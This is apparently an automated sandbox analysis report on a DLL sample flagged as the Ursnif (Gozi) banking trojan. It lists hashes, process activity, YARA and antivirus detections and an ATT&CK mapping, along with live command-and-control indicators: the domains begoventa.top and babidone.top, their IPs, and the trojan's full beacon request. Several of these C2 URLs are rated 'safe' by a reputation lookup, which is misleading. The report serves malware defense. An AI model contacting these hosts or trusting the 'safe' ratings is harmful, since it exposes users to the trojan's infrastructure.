Loading ...

Play interactive tourEdit tour

Analysis Report OgQJzDbLce.dll

Overview

General Information

Sample Name:OgQJzDbLce.dll
Analysis ID:338189
MD5:5268c190b3a6940bc7c8f0361f3a187f
SHA1:56b1b5066f88e07f494e5e97f9a8b791cc9d7bd2
SHA256:8e34c697b603788b9baeecfb375c466cb8468a322d6ae9b81fc41fb61472c3da
Tags:dllGozi

Most interesting Screenshot:

Detection

Ursnif
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Ursnif
Creates a COM Internet Explorer object
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Creates a DirectInput object (often for capturing keystrokes)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6140 cmdline: loaddll32.exe 'C:\Users\user\Desktop\OgQJzDbLce.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
  • iexplore.exe (PID: 6572 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6832 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6572 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6392 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4632 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6392 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3480 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6284 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3480 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6128 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6708 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6128 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.777109164.0000000003AD8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.776993803.0000000003AD8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.777131098.0000000003AD8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000000.00000003.777071428.0000000003AD8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000000.00000003.777173919.0000000003AD8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 4 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: OgQJzDbLce.dllVirustotal: Detection: 21%Perma Link
            Source: 0.2.loaddll32.exe.10000000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: OgQJzDbLce.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
            Source: global trafficHTTP traffic detected: GET /images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/pPJJGC5mrcZE6ZGUWjS/LKs0W_2FZrtLgELoKDEbZR/8X1_2FxjVbkZk/tVcM_2Bd/jQmX3NhgeWRqCDsfD_2BayQ/lSPwdIYz4P/81sFvcaWcXolUgVkt/y_2B1p3Gvpg_/2F0X2_2F87o/JZseyqJj/p.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: begoventa.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: begoventa.topConnection: Keep-Alive
            Source: msapplication.xml0.13.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x33a394ee,0x01d6e846</date><accdate>0x33a394ee,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.13.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x33a394ee,0x01d6e846</date><accdate>0x33a394ee,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.13.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.13.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.13.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.13.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x33a85989,0x01d6e846</date><accdate>0x33a85989,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: babidone.top
            Source: ~DFD4CA446EF33C2D57.TMP.20.dr, {77F8D092-5439-11EB-90EB-ECF4BBEA1588}.dat.20.drString found in binary or memory: http://babidone.top/images/PPpwiauX_2BIh4oFWqX/Djwkz7R93cFnDrrKCEfupn/1lc9UumTDGjRL/5auxQAs_/2B38Hwp
            Source: loaddll32.exe, 00000000.00000002.1018176446.0000000001C10000.00000002.00000001.sdmpString found in binary or memory: http://begoventa.top/images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/p
            Source: loaddll32.exe, 00000000.00000002.1018085048.0000000001697000.00000004.00000020.sdmp, ~DF4EBD4894B35EDD90.TMP.25.dr, {9B722639-5439-11EB-90EB-ECF4BBEA1588}.dat.25.drString found in binary or memory: http://begoventa.top/images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/pPJJGC
            Source: OgQJzDbLce.dllString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
            Source: OgQJzDbLce.dllString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
            Source: OgQJzDbLce.dllString found in binary or memory: http://ocsp.sectigo.com0
            Source: msapplication.xml.13.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml1.13.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml2.13.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.13.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.13.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml5.13.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.13.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.13.drString found in binary or memory: http://www.youtube.com/
            Source: OgQJzDbLce.dllString found in binary or memory: https://sectigo.com/CPS0D

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000000.00000003.777109164.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.776993803.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777131098.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777071428.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777173919.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777044888.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777196001.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777154030.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6140, type: MEMORY
            Source: loaddll32.exe, 00000000.00000002.1018072348.000000000168B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000000.00000003.777109164.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.776993803.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777131098.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777071428.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777173919.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777044888.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777196001.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777154030.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6140, type: MEMORY

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001812 NtMapViewOfSection,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001DD0 GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100022E5 NtQueryVirtualMemory,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100020C4
            Source: OgQJzDbLce.dllStatic PE information: invalid certificate
            Source: OgQJzDbLce.dllBinary or memory string: OriginalFilenamewmprph.exej% vs OgQJzDbLce.dll
            Source: OgQJzDbLce.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
            Source: classification engineClassification label: mal68.bank.troj.winDLL@13/44@3/3
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5E3D54B5-5439-11EB-90EB-ECF4BBEA1588}.datJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DFF6F6BADDE9A18747.TMPJump to behavior
            Source: OgQJzDbLce.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: OgQJzDbLce.dllVirustotal: Detection: 21%
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\OgQJzDbLce.dll'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6572 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6392 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3480 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6128 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6572 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6392 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3480 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6128 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: OgQJzDbLce.dllStatic PE information: section name: .data2
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100020B3 push ecx; ret
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002060 push ecx; ret

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000000.00000003.777109164.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.776993803.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777131098.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777071428.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777173919.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777044888.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777196001.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777154030.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6140, type: MEMORY
            Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\loaddll32.exeMemory protected: page execute read | page guard
            Source: loaddll32.exe, 00000000.00000002.1018176446.0000000001C10000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: loaddll32.exe, 00000000.00000002.1018176446.0000000001C10000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: loaddll32.exe, 00000000.00000002.1018176446.0000000001C10000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: loaddll32.exe, 00000000.00000002.1018176446.0000000001C10000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100019C7 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001799 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000000.00000003.777109164.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.776993803.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777131098.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777071428.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777173919.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777044888.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777196001.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777154030.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6140, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000000.00000003.777109164.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.776993803.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777131098.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777071428.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777173919.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777044888.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777196001.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.777154030.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6140, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation2Path InterceptionProcess Injection2Masquerading1Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryQuery Registry1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsSystem Information Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 338189 Sample: OgQJzDbLce.dll Startdate: 11/01/2021 Architecture: WINDOWS Score: 68 31 Multi AV Scanner detection for submitted file 2->31 33 Yara detected  Ursnif 2->33 6 loaddll32.exe 1 2->6         started        9 iexplore.exe 1 50 2->9         started        12 iexplore.exe 1 50 2->12         started        14 2 other processes 2->14 process3 dnsIp4 35 Writes or reads registry keys via WMI 6->35 37 Writes registry values via WMI 6->37 39 Creates a COM Internet Explorer object 6->39 29 192.168.2.1 unknown unknown 9->29 16 iexplore.exe 31 9->16         started        19 iexplore.exe 28 12->19         started        21 iexplore.exe 35 14->21         started        23 iexplore.exe 32 14->23         started        signatures5 process6 dnsIp7 25 babidone.top 193.56.255.166, 80 INFOCLOUD-SRLMD Romania 16->25 27 begoventa.top 92.38.132.181, 49770, 49771, 80 GCOREAT Austria 19->27

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            OgQJzDbLce.dll22%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            0.2.loaddll32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
            0.2.loaddll32.exe.15b0000.0.unpack100%AviraHEUR/AGEN.1108168Download File

            Domains

            SourceDetectionScannerLabelLink
            begoventa.top2%VirustotalBrowse
            babidone.top2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
            http://babidone.top/images/PPpwiauX_2BIh4oFWqX/Djwkz7R93cFnDrrKCEfupn/1lc9UumTDGjRL/5auxQAs_/2B38Hwp0%Avira URL Cloudsafe
            http://ocsp.sectigo.com00%URL Reputationsafe
            http://ocsp.sectigo.com00%URL Reputationsafe
            http://ocsp.sectigo.com00%URL Reputationsafe
            http://ocsp.sectigo.com00%URL Reputationsafe
            http://begoventa.top/images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/p0%Avira URL Cloudsafe
            http://begoventa.top/favicon.ico0%Avira URL Cloudsafe
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
            https://sectigo.com/CPS0D0%URL Reputationsafe
            https://sectigo.com/CPS0D0%URL Reputationsafe
            https://sectigo.com/CPS0D0%URL Reputationsafe
            http://begoventa.top/images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/pPJJGC5mrcZE6ZGUWjS/LKs0W_2FZrtLgELoKDEbZR/8X1_2FxjVbkZk/tVcM_2Bd/jQmX3NhgeWRqCDsfD_2BayQ/lSPwdIYz4P/81sFvcaWcXolUgVkt/y_2B1p3Gvpg_/2F0X2_2F87o/JZseyqJj/p.avi0%Avira URL Cloudsafe
            http://www.wikipedia.com/0%URL Reputationsafe
            http://www.wikipedia.com/0%URL Reputationsafe
            http://www.wikipedia.com/0%URL Reputationsafe
            http://begoventa.top/images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/pPJJGC0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            begoventa.top
            92.38.132.181
            truefalseunknown
            babidone.top
            193.56.255.166
            truefalseunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://begoventa.top/favicon.icofalse
            • Avira URL Cloud: safe
            unknown
